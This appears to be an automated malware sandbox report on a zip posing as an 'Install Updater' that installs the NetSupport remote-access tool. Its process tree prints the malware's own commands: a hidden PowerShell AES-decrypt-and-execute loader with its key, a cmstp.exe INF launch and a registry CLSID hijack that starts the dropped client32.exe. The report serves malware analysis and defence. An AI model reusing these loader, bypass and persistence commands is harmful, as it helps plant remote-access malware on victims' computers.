Analysis
max time kernel: 141s
max time network: 206s
platform: windows10-2004_x64
resource: win10v2004-20230703-en
resource tags: arch:x64, arch:x86, image:win10v2004-20230703-en, locale:en-us, os:windows10-2004-x64, system
submitted: 18/07/2023, 03:25
Static task: static1
Behavioral task: behavioral1
Sample: Install Updater (V104.551.2)-stable.zip
Resource: win10v2004-20230703-en
General
Target: Install Updater (V104.551.2)-stable.zip
Size: 4.7MB
MD5: fbe7dec7fbb2ab938fb68c68311a4168
SHA1: 08326c945c66fc4ed00e818913258905efbe8495
SHA256: ab08ba5cb3eb0ef2cffeecefe99023bf0f080f19cfe0187892f5b08f41345e39
SHA512: ffa6445d59b07ab31c33aaef1befb1a409140f17d7e1931f8247f409a27b5960f34f48a203fc262acd487c4aef9f969f8d5cf0a3dbabf36b8faca362cf78f5f1
SSDEEP: 98304:86OGtHcG/ILJjjSQ8ByUBIPoVs+90eNDzumoYQBcnG3:86O4HcuI1jHJwVVCeN/umvQcnE
Malware Config
Signatures
-
NetSupport
NetSupport is a remote access tool sold as legitimate system administration software.
-
Blocklisted process makes network request 3 IoCs
flow  pid   Process
57    2944  powershell.exe
60    2944  powershell.exe
66    2944  powershell.exe
-
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description        ioc                                                                                                     Process
Key value queried  \REGISTRY\USER\S-1-5-21-1043950675-1972537973-2972532878-1000\Control Panel\International\Geo\Nation  mshta.exe
-
Executes dropped EXE 1 IoCs
pid   Process
1844  client32.exe
-
Loads dropped DLL 5 IoCs
pid   Process
1844  client32.exe
1844  client32.exe
1844  client32.exe
1844  client32.exe
1844  client32.exe
-
Drops file in System32 directory 1 IoCs
description                   ioc                                                                                                                  Process
File opened for modification  C:\Windows\SysWOW64\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk  powershell.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Kills process with taskkill 1 IoCs
pid   Process
4696  taskkill.exe
-
Modifies registry class 7 IoCs
description      ioc                                                                                                                                                                                       Process
Key created      \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open\command                                                                           reg.exe
Key created      \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node                                                                                                                                            reg.exe
Key created      \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID                                                                                                                                      reg.exe
Key created      \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}                                                                                               reg.exe
Key created      \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell                                                                                         reg.exe
Key created      \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open                                                                                    reg.exe
Set value (str)  \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Roaming\\IonicBaseband\\client32.exe"  reg.exe
-
Suspicious behavior: EnumeratesProcesses 54 IoCs
pid   Process
1368  powershell.exe
1368  powershell.exe
2944  powershell.exe
4572  powershell.exe
2944  powershell.exe
4572  powershell.exe
4784  powershell.exe
4784  powershell.exe
4784  powershell.exe
4784  powershell.exe
4784  powershell.exe
4784  powershell.exe
4784  powershell.exe
4784  powershell.exe
4784  powershell.exe
4784  powershell.exe
4784  powershell.exe
4784  powershell.exe
4784  powershell.exe
4784  powershell.exe
4784  powershell.exe
4784  powershell.exe
4784  powershell.exe
4784  powershell.exe
4784  powershell.exe
4784  powershell.exe
4784  powershell.exe
4784  powershell.exe
4784  powershell.exe
4784  powershell.exe
4784  powershell.exe
4784  powershell.exe
4784  powershell.exe
4784  powershell.exe
4784  powershell.exe
4784  powershell.exe
4784  powershell.exe
4784  powershell.exe
4784  powershell.exe
4784  powershell.exe
4784  powershell.exe
4784  powershell.exe
4784  powershell.exe
4784  powershell.exe
4784  powershell.exe
4784  powershell.exe
4784  powershell.exe
4784  powershell.exe
4784  powershell.exe
4784  powershell.exe
4784  powershell.exe
4596  powershell.exe
4596  powershell.exe
4596  powershell.exe
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
description                          pid   Process
Token: SeDebugPrivilege              1368  powershell.exe
Token: SeDebugPrivilege              2944  powershell.exe
Token: SeDebugPrivilege              4572  powershell.exe
Token: SeDebugPrivilege              4784  powershell.exe
Token: SeDebugPrivilege              4596  powershell.exe
Token: SeIncreaseQuotaPrivilege      4596  powershell.exe
Token: SeSecurityPrivilege           4596  powershell.exe
Token: SeTakeOwnershipPrivilege      4596  powershell.exe
Token: SeLoadDriverPrivilege         4596  powershell.exe
Token: SeSystemProfilePrivilege      4596  powershell.exe
Token: SeSystemtimePrivilege         4596  powershell.exe
Token: SeProfSingleProcessPrivilege  4596  powershell.exe
Token: SeIncBasePriorityPrivilege    4596  powershell.exe
Token: SeCreatePagefilePrivilege     4596  powershell.exe
Token: SeBackupPrivilege             4596  powershell.exe
Token: SeRestorePrivilege            4596  powershell.exe
Token: SeShutdownPrivilege           4596  powershell.exe
Token: SeDebugPrivilege              4596  powershell.exe
Token: SeSystemEnvironmentPrivilege  4596  powershell.exe
Token: SeRemoteShutdownPrivilege     4596  powershell.exe
Token: SeUndockPrivilege             4596  powershell.exe
Token: SeManageVolumePrivilege       4596  powershell.exe
Token: 33                            4596  powershell.exe
Token: 34                            4596  powershell.exe
Token: 35                            4596  powershell.exe
Token: 36                            4596  powershell.exe
Token: SeIncreaseQuotaPrivilege      4596  powershell.exe
Token: SeSecurityPrivilege           4596  powershell.exe
Token: SeTakeOwnershipPrivilege      4596  powershell.exe
Token: SeLoadDriverPrivilege         4596  powershell.exe
Token: SeSystemProfilePrivilege      4596  powershell.exe
Token: SeSystemtimePrivilege         4596  powershell.exe
Token: SeProfSingleProcessPrivilege  4596  powershell.exe
Token: SeIncBasePriorityPrivilege    4596  powershell.exe
Token: SeCreatePagefilePrivilege     4596  powershell.exe
Token: SeBackupPrivilege             4596  powershell.exe
Token: SeRestorePrivilege            4596  powershell.exe
Token: SeShutdownPrivilege           4596  powershell.exe
Token: SeDebugPrivilege              4596  powershell.exe
Token: SeSystemEnvironmentPrivilege  4596  powershell.exe
Token: SeRemoteShutdownPrivilege     4596  powershell.exe
Token: SeUndockPrivilege             4596  powershell.exe
Token: SeManageVolumePrivilege       4596  powershell.exe
Token: 33                            4596  powershell.exe
Token: 34                            4596  powershell.exe
Token: 35                            4596  powershell.exe
Token: 36                            4596  powershell.exe
Token: SeIncreaseQuotaPrivilege      4596  powershell.exe
Token: SeSecurityPrivilege           4596  powershell.exe
Token: SeTakeOwnershipPrivilege      4596  powershell.exe
Token: SeLoadDriverPrivilege         4596  powershell.exe
Token: SeSystemProfilePrivilege      4596  powershell.exe
Token: SeSystemtimePrivilege         4596  powershell.exe
Token: SeProfSingleProcessPrivilege  4596  powershell.exe
Token: SeIncBasePriorityPrivilege    4596  powershell.exe
Token: SeCreatePagefilePrivilege     4596  powershell.exe
Token: SeBackupPrivilege             4596  powershell.exe
Token: SeRestorePrivilege            4596  powershell.exe
Token: SeShutdownPrivilege           4596  powershell.exe
Token: SeDebugPrivilege              4596  powershell.exe
Token: SeSystemEnvironmentPrivilege  4596  powershell.exe
Token: SeRemoteShutdownPrivilege     4596  powershell.exe
Token: SeUndockPrivilege             4596  powershell.exe
Token: SeManageVolumePrivilege       4596  powershell.exe
-
Suspicious use of FindShellTrayWindow 1 IoCs
pid   Process
1844  client32.exe
-
Suspicious use of WriteProcessMemory 36 IoCs
description                       pid   Process         procid_target
PID 1472 wrote to memory of 1368  1472  mshta.exe       101
PID 1472 wrote to memory of 1368  1472  mshta.exe       101
PID 1472 wrote to memory of 1368  1472  mshta.exe       101
PID 1368 wrote to memory of 3564  1368  powershell.exe  104
PID 1368 wrote to memory of 3564  1368  powershell.exe  104
PID 1368 wrote to memory of 3564  1368  powershell.exe  104
PID 3564 wrote to memory of 4572  3564  cmd.exe         107
PID 3564 wrote to memory of 4572  3564  cmd.exe         107
PID 3564 wrote to memory of 4572  3564  cmd.exe         107
PID 3564 wrote to memory of 2944  3564  cmd.exe         106
PID 3564 wrote to memory of 2944  3564  cmd.exe         106
PID 3564 wrote to memory of 2944  3564  cmd.exe         106
PID 2944 wrote to memory of 4784  2944  powershell.exe  109
PID 2944 wrote to memory of 4784  2944  powershell.exe  109
PID 2944 wrote to memory of 4784  2944  powershell.exe  109
PID 4784 wrote to memory of 3228  4784  powershell.exe  110
PID 4784 wrote to memory of 3228  4784  powershell.exe  110
PID 4784 wrote to memory of 3228  4784  powershell.exe  110
PID 3228 wrote to memory of 2796  3228  csc.exe         111
PID 3228 wrote to memory of 2796  3228  csc.exe         111
PID 3228 wrote to memory of 2796  3228  csc.exe         111
PID 4784 wrote to memory of 2188  4784  powershell.exe  112
PID 4784 wrote to memory of 2188  4784  powershell.exe  112
PID 4784 wrote to memory of 2188  4784  powershell.exe  112
PID 3548 wrote to memory of 4596  3548  DllHost.exe     114
PID 3548 wrote to memory of 4596  3548  DllHost.exe     114
PID 3548 wrote to memory of 4596  3548  DllHost.exe     114
PID 4596 wrote to memory of 364   4596  powershell.exe  116
PID 4596 wrote to memory of 364   4596  powershell.exe  116
PID 4596 wrote to memory of 364   4596  powershell.exe  116
PID 4596 wrote to memory of 1844  4596  powershell.exe  118
PID 4596 wrote to memory of 1844  4596  powershell.exe  118
PID 4596 wrote to memory of 1844  4596  powershell.exe  118
PID 3548 wrote to memory of 4696  3548  DllHost.exe     119
PID 3548 wrote to memory of 4696  3548  DllHost.exe     119
PID 3548 wrote to memory of 4696  3548  DllHost.exe     119
Processes
(process tree; [N] is the tree depth shown in the report, child processes are indented under their parent)

[1] C:\Windows\Explorer.exe
    C:\Windows\Explorer.exe /idlist,,"C:\Users\Admin\AppData\Local\Temp\Install Updater (V104.551.2)-stable.zip"
    PID: 1112

[1] C:\Windows\System32\rundll32.exe
    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
    PID: 1392

[1] C:\Windows\SysWOW64\mshta.exe
    "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\Temp1_Install Updater (V104.551.2)-stable.zip\Install Updater (V104.551.2)-stable.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    PID: 1472

  [2] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $uGSyEn = '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';$QcRGrPc = 'ZWdYRXFVeWZGcVZNVlJXYWxURnRZc2ZZeFFoUk9XSWQ=';$WpXrWka = New-Object 'System.Security.Cryptography.AesManaged';$WpXrWka.Mode = [System.Security.Cryptography.CipherMode]::ECB;$WpXrWka.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$WpXrWka.BlockSize = 128;$WpXrWka.KeySize = 256;$WpXrWka.Key = [System.Convert]::FromBase64String($QcRGrPc);$SSGYL = [System.Convert]::FromBase64String($uGSyEn);$yAgygcvl = $SSGYL[0..15];$WpXrWka.IV = $yAgygcvl;$ixbKtdOeJ = $WpXrWka.CreateDecryptor();$AbQURXmxw = $ixbKtdOeJ.TransformFinalBlock($SSGYL, 16, $SSGYL.Length - 16);$WpXrWka.Dispose();$tZUSbrft = New-Object System.IO.MemoryStream( , $AbQURXmxw );$UfhVzIKO = New-Object System.IO.MemoryStream;$KFAgbvVxM = New-Object System.IO.Compression.GzipStream $tZUSbrft, ([IO.Compression.CompressionMode]::Decompress);$KFAgbvVxM.CopyTo( $UfhVzIKO );$KFAgbvVxM.Close();$tZUSbrft.Close();[byte[]] $qvUGhdu = $UfhVzIKO.ToArray();$AjSplBV = [System.Text.Encoding]::UTF8.GetString($qvUGhdu);$AjSplBV | powershell - }
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      PID: 1368

    [3] C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /c powershell.exe $uGSyEn = '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';$QcRGrPc = 'ZWdYRXFVeWZGcVZNVlJXYWxURnRZc2ZZeFFoUk9XSWQ=';$WpXrWka = New-Object 'System.Security.Cryptography.AesManaged';$WpXrWka.Mode = [System.Security.Cryptography.CipherMode]::ECB;$WpXrWka.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$WpXrWka.BlockSize = 128;$WpXrWka.KeySize = 256;$WpXrWka.Key = [System.Convert]::FromBase64String($QcRGrPc);$SSGYL = [System.Convert]::FromBase64String($uGSyEn);$yAgygcvl = $SSGYL[0..15];$WpXrWka.IV = $yAgygcvl;$ixbKtdOeJ = $WpXrWka.CreateDecryptor();$AbQURXmxw = $ixbKtdOeJ.TransformFinalBlock($SSGYL, 16, $SSGYL.Length - 16);$WpXrWka.Dispose();$tZUSbrft = New-Object System.IO.MemoryStream( , $AbQURXmxw );$UfhVzIKO = New-Object System.IO.MemoryStream;$KFAgbvVxM = New-Object System.IO.Compression.GzipStream $tZUSbrft, ([IO.Compression.CompressionMode]::Decompress);$KFAgbvVxM.CopyTo( $UfhVzIKO );$KFAgbvVxM.Close();$tZUSbrft.Close();[byte[]] $qvUGhdu = $UfhVzIKO.ToArray();$AjSplBV = [System.Text.Encoding]::UTF8.GetString($qvUGhdu);$AjSplBV | powershell -
        - Suspicious use of WriteProcessMemory
        PID: 3564

      [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -
          - Blocklisted process makes network request
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          - Suspicious use of WriteProcessMemory
          PID: 2944

        [5] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -ExecutionPolicy UnRestricted -Encoded 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
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            - Suspicious use of WriteProcessMemory
            PID: 4784

          [6] C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\beumlt25\beumlt25.cmdline"
              - Suspicious use of WriteProcessMemory
              PID: 3228

            [7] C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES42F0.tmp" "c:\Users\Admin\AppData\Local\Temp\beumlt25\CSCF5AF3DF95E0D4AF7A03E278C2DF0CAFC.TMP"
                PID: 2796

          [6] C:\Windows\SysWOW64\cmstp.exe
              "C:\Windows\system32\cmstp.exe" /au "C:\Users\Admin\AppData\Local\Temp\CMSTP.inf"
              PID: 2188

      [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe $uGSyEn = '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';$QcRGrPc = 'ZWdYRXFVeWZGcVZNVlJXYWxURnRZc2ZZeFFoUk9XSWQ=';$WpXrWka = New-Object 'System.Security.Cryptography.AesManaged';$WpXrWka.Mode = [System.Security.Cryptography.CipherMode]::ECB;$WpXrWka.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$WpXrWka.BlockSize = 128;$WpXrWka.KeySize = 256;$WpXrWka.Key = [System.Convert]::FromBase64String($QcRGrPc);$SSGYL = [System.Convert]::FromBase64String($uGSyEn);$yAgygcvl = $SSGYL[0..15];$WpXrWka.IV = $yAgygcvl;$ixbKtdOeJ = $WpXrWka.CreateDecryptor();$AbQURXmxw = $ixbKtdOeJ.TransformFinalBlock($SSGYL, 16, $SSGYL.Length - 16);$WpXrWka.Dispose();$tZUSbrft = New-Object System.IO.MemoryStream( , $AbQURXmxw );$UfhVzIKO = New-Object System.IO.MemoryStream;$KFAgbvVxM = New-Object System.IO.Compression.GzipStream $tZUSbrft, ([IO.Compression.CompressionMode]::Decompress);$KFAgbvVxM.CopyTo( $UfhVzIKO );$KFAgbvVxM.Close();$tZUSbrft.Close();[byte[]] $qvUGhdu = $UfhVzIKO.ToArray();$AjSplBV = [System.Text.Encoding]::UTF8.GetString($qvUGhdu);$AjSplBV
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          PID: 4572

[1] C:\Windows\SysWOW64\DllHost.exe
    C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}
    - Suspicious use of WriteProcessMemory
    PID: 3548

  [2] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -ExecutionPolicy unrestricted -WindowStyle hidden -Encoded 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
      - Drops file in System32 directory
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      PID: 4596

    [3] C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" Add HKEY_CLASSES_ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open\command /f /ve /t REG_SZ /d C:\Users\Admin\AppData\Roaming\IonicBaseband\client32.exe
        - Modifies registry class
        PID: 364

    [3] C:\Users\Admin\AppData\Roaming\IonicBaseband\client32.exe
        "C:\Users\Admin\AppData\Roaming\IonicBaseband\client32.exe"
        - Executes dropped EXE
        - Loads dropped DLL
        - Suspicious use of FindShellTrayWindow
        PID: 1844

  [2] C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM cmstp.exe /F
      - Kills process with taskkill
      PID: 4696
-
Network
MITRE ATT&CK Enterprise v6
Downloads